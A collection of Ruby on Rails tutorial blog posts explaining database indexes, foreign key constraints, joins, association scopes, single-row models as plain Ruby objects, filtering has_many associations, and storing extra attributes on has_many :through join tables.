If you’re with me so far, it’s clear to you that an index on a column makes it faster for the database to look up a row or a set of rows which satisfy a given condition on that column. With that, we can come up with a rule of thumb:

You should add an index on a column if most (or many) of the queries you write for the table involve that column.

In a typical Rails application, there’s one type of column that is pretty much guaranteed to be involved in most queries for tables that it is in, and that is the foreign key column.

Let’s consider an example.

Say you have a User and a Post model, and the User has_many :posts. This of course means that the :posts table has a foreign key column user_id, and that whenever we do something like @user.posts or @post.user, we are asking the database to look up a given user_id for one or many Post records. Without an index, the database would have to look up each row in the posts table, one by one, to see if their user_id matched what was given. If there are many Post records (in other words, if Post.count returns a huge number), then this would take a lot of time. So, we would add an index to the posts table on user_id.

Right now, you’ll have to take my word for it that this is an improvement. But I’ll cover how you can verify this for yourself very soon.

So, add indexes by default to your foreign key columns. This is considered a standard Rails practice.

“Non-foreign key” columns can also be good candidates for adding indexes on. If they’re referred to a lot in your table queries, and you have a sizable number of rows in your table, then it would probably benefit you to add an index on them. Common examples I’ve come across in my experience are the date_of_birth, email, name columns in a User table. Remember to apply the rule of thumb discussed above if you’re unsure.

How to Index

You know what an index is and when to use it. Here’s where we cover how you can begin to actually use them in your Rails app.

When you’re associating two models with no prior connection

If you have two models which you want to associate, you know that you have to create a foreign key column on one of them. It turns out that in Rails 4 and beyond, you can create an index at the same time (which you would want to do in most cases), with the add_reference method.

Say you’ve created a User and Post model, and you want to set up a has_many relationship between them in your DB, you could do this in your console:

rails g migration AddUserToPosts user:references

which will generate a migration which uses the ‘add_reference` method like so:

add_reference :posts, :user, index: true

The add_reference method will not only create a user_id column on your Post table, but also add an index on user_id. Nifty. You can also pass in foreign_key: true to this method to add in a database constraint

Adding an index to an existing association

If for some reason, you don’t have access to the add_reference method, or you’ve already created a user_id column without adding an index to it, you can use the add_index method in your migration like so:

add_index :posts, :user_id

You can use the add_index method to add an index on any column in the table.

How to check if your index made a difference

So far, you’ve taken my word that indexing is a good thing which speeds up your app in ways that are relevant to business goals. But you don’t have to, because you can use ActiveRecord's #explain method to verify if adding an index made a difference to your query time or not. This will also help you determine the situations where indexing doesn’t give you much of a performance benefit.

The #explain method in ActiveRecord maps to the EXPLAIN command in SQL, and one of the things this command does is tell you how long the database thinks the query in question will take. The specifics of how the database formats this “explanation” and the units it measures “execution time” in depend on the database you’re using. Two common databases in the Rails world are Postgres and MySQL, so I’ll give you the basics on those.

To see the output of the #explain method, you simply send the #explain message to the query you’re writing, like so:

Post.where(user_id: 23).explain

If you’re on a Postgres database, and you’ve run explain on a query, you’ll want to look at the cost numbers. The higher this number is, the longer the database thinks your query is going to take. You’ll typically see a range being output for cost.

If you’re on a MySQL database, you’ll want to look at the rows number, which tells you how many rows the database thinks its going to have to go through to get you a result. The higher this number, the longer the database thinks your query is going to take.

In short, by using ‘#explain’ before and after you’ve added an index, you can see for yourself how much of a difference adding the index has made.

This article, and this one, written by Tom Ward, a Rails contributor and developer at Basecamp, are fantastic reads which go deeper into indexing and show you how you can make sense of the explain method’s output (he uses MySQL in his examples).

Tom also has this handy script, which you can use to list any foreign keys you might have missed indexing.

Advanced Topics

Indexing is a vast topic, and if you want to dig deeper, here are some starting points:

A free book on indexing

This book covers many things I didn’t cover here. Definitely worth a read.

When not to use an index

  1. Check this out, and
  2. this.

Optimizing Indexes

  1. Tips on optimizing indexes

Terms to Google

  1. Partial Indexes
  2. Redundant Indexes

As always, hit me up in the comments section if you’re stuck on anything in particular or if there’s a topic you want me to write more about. Cheers, and until next time!

All About Foreign Keys

The concept of “foreign keys” in the Rails world has quite the potential to confuse, because, depending on the context of use, the intended meaning might actually differ! In addition, you might find yourself wondering how things like “references”, “foreign keys”, “associations” and “joins” are different, and why you should use one or not use the other.

You’ve probably reached a point in your Rails life where you want to understand more about how ActiveRecord works with your database. As you’ve become familiar with the ActiveRecord API, you have built up an intuition about how things work, but you know that to build efficient and elegant web applications with Ruby and Rails, it will benefit you greatly to deepen your understanding.

Foreign Keys

A foreign key is a mechanism that you can use to associate one table to another. Typically, it takes the form of a column with the name <other_table_name>_id. Let’s say you have a User table and a Project table, and you’ve used a has_many on User, you’ll see that a statement like user.projects when translated into SQL by ActiveRecord will automatically use user_id as a foreign key. Check it out yourself and see, try:


in your console. You should see an SQL statement that is searching for all projects with a user_id corresponding to user‘s ID.

ActiveRecord relies on this column to figure out which projects of all in the projects table are “related” or “associated” to the given user.

You probably know that doing has_many is not enough. You will also have to add a column to the Project table with the name user_id. Your migration might look like:

add_column :projects, :user_id, :integer

Newer versions of ActiveRecord also provide the #references and #add_reference method, which take care of adding the foreign key column for you. So, instead of using the add_column method, you can use the add_reference method, like so:

add_reference :projects, :user

This will add a user_id column to the projects table. The advantage with using the reference method is that you can add an index and a database constraint on the foreign key painlessly as well.

Check out this doc and this doc for more info.

Referential Integrity

If you were wondering what I meant when I said ‘database constraint on the foreign key’, rest assured, because I’m going to cover what that means here.

It depends on who you’re talking to, but in many contexts, a foreign key in the Rails world is understood plainly as the column itself. Depending on your use case, this could be enough. Keep in mind though, that the problem with this approach is that when we only have a foreign key column, we have no way of ensuring that for a given value of user_id, a corresponding User record actually exists. This has the potential to lead to confusion down the line.

To know what I mean, fire up your console and try the following (assuming you have the same setup as above, and that we have one User in the system with ID = 1)

project = Project.create(name: 'hit song', user_id: 2)

You should be able to create the project, but when you do project.user, you’ll get back nil. AKA an orphaned project. You can solve this with a validates in your model to ensure uniqueness and/or presence of the user, but you might find yourself in a situation where you’re bypassing validation callbacks somehow (probably with a bulk operation), and yet again creating orphans.

What solves this problem, is getting the database to ensure that orphaned records are not created.

Enter the add_foreign_key method, which you’ll notice is sort of a second meaning for the term ‘foreign key’. Using this method in your migration tells the database (in the way only ActiveRecord knows how) to enforce referential integrity by adding a foreign key constraint.

This very good article from the robots at thoughtbot goes into many of the finer details of this concept, and why it’s important.

You’d use it like so:

add_column :projects, :user_id
add_foreign_key :projects, :users

This Rails doc gives some additional details.

If you’re using the add_reference method, you can pass in a boolean to indicate if a foreign key constraint is to be added, like so:

add_reference :projects, :user, foreign_key: true

The .joins method

If you came to Rails without a background in SQL (like me), you’ve probably wondered about the .joins method, how it is related to the concept of associations and foreign keys, and when you should use it.

The rule of thumb with the .joins method is that you need to use it when you need to query more than one table at the same time.

In other words, if the query you’re writing for a given table/model needs to reference attributes in another table (or more), you will need to invoke .joins to make this happen. This holds true regardless of if the tables are associated to each other with a foreign key column or constraint.

So for example, if we want to query the projects table for all projects that are owned by a user of role ‘manager’ (assuming we have a ‘role’ column on the users table), we’d do:

Project.joins(:user).where(user: { role: 'manager' })

You’ll notice that if you try this without the .joins, ActiveRecord will complain.

For some background on joins, check out this nice summary on the different types of joins you can do in SQL. You can even use the .joins method to query multiple tables that are not associated to one another if you so choose. I encourage you to fire up the console and use the .to_sql method for your queries whenever you’re stuck to get a better handle on what ActiveRecord is doing behind the scenes.

Hope this helped, and as always, please leave a comment below if you’re stuck on something that you need help with or if something above was unclear in any way. I’d love to help out!

Using scopes with has_many and belongs_to

Implementing scopes on your associations can cause much confusion and frustration; especially when you see hard to interpret SQL-y errors being returned, (you’ve probably seen error messages which start with PG::UndefinedTable: ERROR: missing FROM-clause entry for table..., right?) and have no idea how to go about fixing them.

When you have a belongs_to or a has_one/has_many (with or without :through) association defined on your model, you will in many situations benefit from defining scopes in your model that reference your association. Defining a custom scope which references attributes in your association table(s) has the potential to DRY up your code and make code in other parts of your application easier to understand.

Defining scopes directly on the association

ActiveRecord's has_many and belongs_to methods give you the ability to define scopes directly on the association. This way, you can customize the SQL that is generated when you access the association.

Say you have a User model which has_many posts, and when you do @user.posts, you only want to return the posts which were created in the last year. Your User model would look like:

class User < ActiveRecord::Base
  has_many :posts, -> { where('created_at > ?', Time.current - 1.year) }

Because you’ve defined the scope this way, when you do @user.posts, the generated query will include the where condition above so that any posts returned will have been created within the past year.

You can also pass in an argument to this scope, which allows you to further customize the generated query. Say instead of defaulting to 1 year you wanted to pass in the timeframe, you could do something like:

class User < ActiveRecord::Base
  has_many :posts, ->(timeframe) { where('created_at > ?', timeframe }

One gotcha to keep in mind, especially when using columns like created_at which are common to most tables, is that you might have to specify the table name explicitly in your scope if your DB complains.

So the above would look like:

class User < ActiveRecord::Base
  has_many :posts, ->(timeframe) { where('posts.created_at > ?', timeframe) }

Referencing attributes of the association table in your scope

You might also sometimes benefit from defining scopes in the parent model which reference attributes of your association. Adding to the example above, let’s say you wanted to define a scope on the User model which returns all users who have pending posts (posts which haven’t been “approved” yet).

class User < ActiveRecord::Base
  has_many :posts
  scope :with_pending_posts, -> { joins(:posts).where('posts.pending = true') }

Couple of things to note from the scope definition above:

  1. You have to use the joins method in your scope so that your DB knows which table you’re referring to.
  2. To reference association attributes in the where method, you have to use the table name of the association followed by the column name (posts.pending in this case) to prevent your DB from complaining, and to have it return the expected result.

A corollary from the points above is that you can technically reference attributes of any table in your scope, even if they are not explicitly defined as an association in your model. You’d of course have to set up your joins correctly – refer to the ActiveRecord documentation for more info, and if you’re still stuck, ping me in the comments below!

Update: Kevin pointed out in the comments section that instead of doing:

scope :with_pending_posts, -> { joins(:posts).where('posts.pending = true') }

you could do:

scope :with_pending_posts, -> { joins(:posts).merge(Post.pending) }

This is definitely worth a consideration as it makes your code cleaner and easier to read. Not only that, you will probably be able to make use of the scope you define on your Post model in other areas of your system.

If you haven’t seen the merge method before, take a look at the following resources to get acquainted and some ideas on how it could be useful:

  1. ActiveRecord documentation on merge
  2. A useful article via gorails.com on using merge with scopes
  3. An article I wrote on 4 ways to filter has_many associations, one of which includes using the merge method

Troubleshooting error messages

When the scope you’re building is complex, you’ll probably run into errors, especially SQL errors. It will benefit you greatly to learn how to read these errors and understand what your DB is complaining about. Typical complaints include tables which are not defined and columns which don’t exist because the query is looking for them in the wrong table.

Remember that a custom scope is the same as defining a class method. So if you’re stuck, ask yourself how you would implement the scope as a class method.

Keep in mind that if you want your scope to do calculations based on association attributes, you might not be able to use Ruby, and will have to brush up on your SQL (more importantly, SQL that works with your DB of choice) to accomplish what you need.

For example, check out the scope below, where for an Availability model, we’re returning records whose start_time is greater than an associated Venue's notice_time, which in this case happens to be stored as an integer. As you’ll notice, Now() and 1 hour::interval are Postgres specific SQL.

class Availablity < ActiveRecord::Base
  has_one :venue
  scope :after_notice_time, -> { joins(:venue).where("start_time >= now() + venues.notice_time * '1 hour'::interval") }

Check out this Reddit thread for more details on the above example.

Also, if you haven’t seen this before, this Railscast is an amazing resource for getting deeper into association scopes.

As always, let me know in the comments how I can help you – cheers!

Should I create a model if it will only have 1 row?

A post on Reddit says:

I’m not sure how best to do this. I would just set up a model, but that seems wrong to have a model with just 1 row in it (it’s a single charity). Is there a better way to do this? STI? something else?

It can seem like overkill to create a database table and a corresponding ActiveRecord model if you know for a fact that your table will only have one row. This is a pretty common situation, and there are a couple of ways to deal with this.

Note: Pat Maddox’s amazing comment on Reddit, which addresses this question, was the primary inspiration for this post.

First, if non-developers need the ability to update information that this “model” would contain, then yes, you should create an ActiveRecord model. This will of course give you all the benefits of ActiveRecord as well, like being able to use has_many, belongs_to and everything else.

If only developers are going to be concerned with and using this model, you don’t have to tie it to the database and can implement it as a “Plain Old Ruby Object” aka a “PORO”.

The advantage with PORO’s is that they are cheap to instantiate because you won’t be making a call to the database when you do so. Setting up association-like behavior can be as simple as defining either instance or class methods on the PORO. As Pat advises in his comments however, you should always ask yourself what benefit you’d get from implementing association-like behavior in your PORO to ensure that you’re doing it for the right reasons, and to keep your code easy to understand.

So, going with the example in the Reddit post above, where we have a Charity model (this is the model that will only have one “row” and the one we will be writing a PORO for) which needs to define a has_many type association with the Donation model, you’d have something that looks like:

class Charity #this is our PORO
  def name
    'The Human Fund'

  def donations

class Donation < ActiveRecord::Base #this corresponds to a table in the DB
  validates :amount, presence: true

  def charity

As you can see, we’re manually defining the methods (#donations and #charity) that we’d get automatically if we used has_many. This allows us to get around the fact that a Charity object does not correspond to a table in the database, and lets other parts of our code use Charity objects as they would any other ActiveRecord object.

For more association type goodness on POROs, also check out the activemodel-associations gem.

So if you decide to go with a PORO, you next question is probably: Where should this file reside?

There are a couple of common options – in the models directory with the rest of the models in /app/models, or in the /lib directory. Pat Maddox recommends the models directory, and I concur, because if you’re going to treat it like a model in other parts of your code, it’s natural that other developers (or you in the future) will look for the class in the models directory. That being said, this is just a convention, and either way works.

As always, let me know in the comments below if you have a question that is not covered by this article (maybe polymorphic associations?), and I’ll get back to you ASAP.

4 ways to filter has_many associations

You have a model that has_many associations, and you’d like to get a collection of these models with their associations that satisfies a list of conditions both on the model and the association records. You’ve tried a few things, but whatever you’ve tried only “sort of” works (meaning, not really) and leaves you feeling like you need a push in the right direction.

Filtering has_many associations can be one of those problems which makes you scratch your head and want to do some extra reading to brush up on your SQL and ActiveRecord knowledge.

For example, let’s say you have User and Project models in your system, and you want to write a query that retrieves a collection of users with projects that were created in a given date range.

Depending on what you want your query to return, here are 4 different ways to approach this problem:

  1. The simplest thing you can do is to combine the joins and where methods that ActiveRecord gives you, like so:

    User.joins(:projects).where(projects: { zipcode: 30332 })

    This technique is a good choice when you need to filter your records by one or more attributes. This will give you back a collection of User records which all have projects with a zipcode of 30332.

    One gotcha to keep in mind is that since you’re doing a INNER JOIN with the joins method, this can return duplicates. Read on to point 2 to see how you can get around this.

  2. More often than not, you might have scopes defined on your association models which you want to re-use. So when you want to use these scopes to do your filtering, get acquainted with ActiveRecord's merge function. According to the ActiveRecord documentation, merge returns an array representing the intersection of the ActiveRecord::Relation that you call merge on, and the ActiveRecord::Relation that you pass in.

    So, for example, if you have a scope in your Project model called opened_recently, which returns all projects which have been created within the last 10 days, you can do something like:


    This will return to you a list of User objects which all satisfy the condition of having projects which were opened recently.

    Like I said before, one thing to keep in mind when you’re using joins for a has_many association is that since you are doing an INNER JOIN, it is possible that you will get back duplicate User (in our example) objects – basically one object for every ‘match’. It’s easy enough to get around this with a call to the uniq method.


    The uniq method works by changing your query from something like SELECT `users` from ... to something like SELECT DISTINCT `users` from...

  3. If you’re going to be needing to retrieve information from the records you filter, especially information stored in the associations of these records, another option to consider is eager loading and the includes method. As you probably know, the benefit of eager loading is that you get to avoid the N + 1 queries problem.

    It’s pretty straightforward to filter by attributes or scopes on the association:

    User.includes(:projects).where(projects: { zipcode: '30332' })

    This will give us all users who have projects in Atlanta, and also eager load their projects.

    If in your .where you want you use an SQL fragment, then you need to call the references method:

    User.includes(:projects).where('projects.deleted_at IS NOT NULL').references(:projects)

    You can also use the merge method in conjunction with includes and references to make use of any scopes you might have defined in your association models, like so:


    You won’t need to use uniq when you use includes because ActiveRecord will take care of it for you automatically.

  1. Now, what should you do if you want your collection to only have those associations which meet your filter criteria? This situation arose for me when I had to write an API endpoint which let app users pass in parameters to filter associations. There are a couple of ways you can approach this. In my case, since I had to return an object that would eventually be converted to JSON, the simplest way was to manually construct a hash which contained the record and the filtered associations.

So I did something like this in my controller:

def show 
  user_attributes.merge(projects: filtered_projects) 

def user_attributes 
  # returns a hash containing attributes for the given user 
  # something like this: # { id: 1, first_name: 'Rick', last_name: 'Sanchez' } 

def filtered_projects 
  # here's where I used any Project related params to filter down my projects 
  # something like Project.opened_after(params[:project_date]).as_json 
  # I use as_json because I need this method to return a hash 

Note that the merge method used here is the one for Hash, and not the ActiveRecord method. You should be able to extend this to return multiple users as well.

Another way to do this is by defining a scoped has_many association. If you’re interested in seeing how this might be done, ping me in the comment section below and I’ll do a post on this topic specifically.

Hope this was helpful. As always, if you have a question about this topic that isn’t specifically addressed above, leave a comment below, and I’ll do my best to help out!

How to use has_many :through with additional attributes on the join table

A common area where developers can get hung up is when using has_many :through. has_many :through essentially allows you to link two models together with a “join table”. Though it can be pretty simple to work with, things can get confusing when you find yourself having to pass and store additional attributes in this join table.

“I have read every post on the internet pertaining to has_many through with additional attributes on the join table and I am still not getting it”

“how do you store extra info in the join model and extract that out later?”

If you followed along my previous post, at this point you should have a good idea of how to write your models, controllers and views such that you can create, display and edit records which use a has_many :through association. If you’re still stuck on that, leave a comment below and I’ll try to sort you out. Make sure to check out Ryan Bates screencast on the basics, and also checkout Rahoul’s article on when you should has_many in the first place.

So, what do you do when you want to store/access additional attributes in the join table?

You already know how to set up your view form so that it passes in parameters to your controller and correctly creates a new record in the join table. If you’re using checkboxes in your view, the checkbox code probably looks like this:

<% Group.all.each do |group| %>
  <%= check_box_tag "user[group_ids][]", group.id, @user.group_ids.include?(group.id) %>
  <%= group.name %>
  <br />
<% end %>

…assuming that you have a User and Group models and a UserGroup which functions as the join.

And your controller #create action should be very similar to this:

def create

def user_params
  params.require(:user).permit(group_ids: [])

As you can see, we don’t have to do anything special in the controller because group_ids will be accepted as a parameter (it is part of the dynamic programming which happens when you call has_many). You do have to correctly permit the group_ids param though.

Now, let’s say for a given user you want to specify if they are an admin of the group or not, via checkbox.

I’m going to assume that we will have an edit page for each group record, and on this page, we will see all the users that belong to this group along with a checkbox next to each user indicating if they are an admin or not.

The View

In my group edit page, I want to show the users that are in the group and next to each user show a checkbox allowing me to select if the user is going to be an admin.

<%= form_for @group do |f| %>
  <%= @group.inspect %>
  <br />
  <% if @group.user_groups.present? %>
    <%= f.fields_for :user_groups do |ugf| %>
      <% user = ugf.object.user %>
      <%= user.name %>
      <%= ugf.check_box :admin %>
      <br />
    <% end %>
  <% else %>
    No Users in this group yet
  <% end %>
  <%= f.submit 'Update group' %>
<% end %>

Couple of things to note here:

1) I’m using the user_groups association. By using fields_for on this association, I can treat it like any other association of group and build a custom form for it.

2) When submitting this form, the user_groups parameters will be passed in under the user_groups_attributes key in the params hash.

The Model

To be able to pass in a hash with user_groups_attributes to the Group model and call update or save on it, we need to use the accepts_nested_attributes_for method. This method tells Rails and ActiveRecord how to correctly deal with user_groups_attributes being in the params hash.

Our Group would look like this:

class Group < ActiveRecord::Base
  has_many :user_groups
  has_many :users, through: :groups
  accepts_nested_attributes_for :user_groups

So the parameter we pass in to accepts_nested_attributes_for is the model/association we want to accept nested attributes for.

The Controller

Because of the setup we did above in the Group model, we can now use the usual update method with the params that we get from the view/form.

def update
  @group = Group.find(params[:id])

def group_params
  params.require(:group).permit(user_groups_attributes: [:admin, :id])

If you’re using Rails 4 and strong_parameters, you will have to make sure you permit the correct parameters.

And that’s it! You should now be able to update this admin attribute on the UserGroup join table. You can follow the same approach for different types of data as well (like a text field for example). I encourage you to look deeper into what the params hash looks like once it gets to the controller so that you get more comfortable with it. Play with this idea in Rails console as well to increase your confidence.

I’ve posted an example app on github – check it out if you need more info about how exactly to get this to work. If you’re still stuck, or are dealing with a use case which is not similar to this, post in the comments section below and I’ll try to help.